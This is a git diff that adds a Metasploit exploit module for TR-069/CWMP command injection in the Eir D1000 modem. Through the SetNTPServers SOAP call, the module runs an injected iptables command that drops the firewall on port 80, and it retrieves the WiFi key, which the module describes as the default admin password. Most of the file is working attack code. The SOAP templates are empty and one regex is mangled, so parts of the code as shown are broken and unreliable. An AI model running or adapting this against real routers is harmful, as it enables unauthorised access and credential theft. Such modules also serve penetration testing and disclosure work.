diff --git a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
new file mode 100644
index 0000000000..6d2a32db2c
--- /dev/null
+++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
@@ -0,0 +1,146 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Eir D1000 Modem CWMP Exploit POC',
+ 'Description' => %q{
+ This exploit drops the firewall to allow access to the web administration interface on port 80 and
+ it also retrieves the wifi password. The default login password to the web interface is the default wifi
+ password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
+ },
+ 'Author' =>
+ [
+ 'Kenzo', # Vulnerability discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Nov 07 2016',
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
+ },
+ 'Targets' =>
+ [
+ [ 'MIPS Little Endian',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE
+ }
+ ],
+ [ 'MIPS Big Endian',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE
+ }
+ ],
+ ],
+ 'DefaultTarget' => 1
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(7547), # CWMP port
+ ], self.class)
+
+ @data_cmd_template = ""
+ @data_cmd_template << ""
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " %s"
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << ""
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => '/globe'
+ })
+ rescue ::Rex::ConnectionError
+ vprint_error("A connection error has occured")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res and res.code == 404 and res.body =~ /home_wan.htm/
+ return Exploit::CheckCode::Appears
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ print_status("Trying to access the device...")
+
+ unless check == Exploit::CheckCode::Appears
+ fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+ end
+
+ print_status("Exploiting...")
+ print_status("Dropping firewall on port 80...")
+ execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
+ key = get_wifi_key()
+ print_status("WiFi key is #{key}")
+ execute_command("tick.eircom.net","")
+ end
+
+ def execute_command(cmd, opts)
+ uri = '/UD/act?1'
+ soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
+ data_cmd = @data_cmd_template % "#{cmd}"
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'ctype' => "text/xml",
+ 'method' => 'POST',
+ 'headers' => {
+ 'SOAPAction' => soapaction,
+ },
+ 'data' => data_cmd
+ })
+ return res
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+
+ def get_wifi_key()
+ print_status("Getting the wifi key...")
+ uri = '/UD/act?1'
+ soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
+ data_cmd_template = ""
+ data_cmd_template << ""
+ data_cmd_template << " "
+ data_cmd_template << " "
+ data_cmd_template << " "
+ data_cmd_template << " "
+ data_cmd_template << ""
+ data_cmd= data_cmd_template
+
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'ctype' => "text/xml",
+ 'method' => 'POST',
+ 'headers' => {
+ 'SOAPAction' => soapaction,
+ },
+ 'data' => data_cmd
+ })
+
+ /NewPreSharedKey>(?.*)<\/NewPreSharedKey/ =~ res.body
+ return key
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+end